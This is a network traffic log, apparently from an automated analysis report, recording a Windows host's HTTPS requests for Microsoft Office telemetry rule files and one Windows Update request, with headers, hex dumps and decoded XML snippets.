                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              106192.168.2.64984713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:54 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:54 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1358
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                              x-ms-request-id: 45336a67-c01e-0014-2f6a-3ca6a3000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123954Z-174c587ffdf8fcgwhC1TEBnn7000000004qg0000000000zc
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:54 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              107192.168.2.64985113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:55 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:55 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1389
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                              x-ms-request-id: fc36ce39-f01e-0003-6838-3e4453000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123955Z-15b8b599d88vp97chC1TEB5pzw00000004g0000000002pck
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:56 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              108192.168.2.64985213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:55 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:56 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1352
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                              x-ms-request-id: 10014087-701e-006f-2038-3eafc4000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123956Z-15b8b599d88hr8sfhC1TEBbca400000004cg0000000045hg
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:56 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              109192.168.2.64985313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:56 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:56 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1405
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                              x-ms-request-id: 9613c870-301e-0052-532e-3d65d6000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123956Z-178bfbc474bv587zhC1NYCny5w00000005tg0000000094cv
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:56 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              110192.168.2.64986313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:56 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:56 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1368
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                              x-ms-request-id: 110996dd-801e-0048-7360-3bf3fb000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123956Z-178bfbc474b9xljthC1NYCtw9400000005w0000000007hes
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:57 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              111192.168.2.64984113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:56 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:56 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1395
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                              x-ms-request-id: cb31e276-601e-00ab-1151-3c66f4000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123956Z-178bfbc474bwlrhlhC1NYCy3kg00000005xg000000009xq7
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:57 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              112192.168.2.64986813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:58 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:58 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1364
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE1223606"
                                                                                                                                                                                              x-ms-request-id: 6d656984-c01e-008d-0d1b-3d2eec000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123958Z-178bfbc474bbcwv4hC1NYCypys00000005y0000000000d7r
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:58 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              113192.168.2.64986713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:58 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:58 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1401
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE055B528"
                                                                                                                                                                                              x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123958Z-178bfbc474btvfdfhC1NYCa2en000000062g000000004vxk
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:58 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              114192.168.2.64987013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:58 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:58 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1397
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE7262739"
                                                                                                                                                                                              x-ms-request-id: 9aa8fa60-a01e-001e-5131-3c49ef000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123958Z-178bfbc474bmqmgjhC1NYCy16c000000060g000000007z4x
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:59 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              115192.168.2.6498734.175.87.197443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:58 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Sp8chA7XUbEVBFr&MD=AEems1gD HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                                              2024-11-24 12:39:59 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                              MS-CorrelationId: e2e3aa27-ba80-4bb5-9da0-2b8676ebfdc0
                                                                                                                                                                                              MS-RequestId: 4f46e526-a9b7-45c7-b1c7-38711b34077d
                                                                                                                                                                                              MS-CV: khoN9ana50SPws2f.0
                                                                                                                                                                                              X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:58 GMT
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Content-Length: 30005
